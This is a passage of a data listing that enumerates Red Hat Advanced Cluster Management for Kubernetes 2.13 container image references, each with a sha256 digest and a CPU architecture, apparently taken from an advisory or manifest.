"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
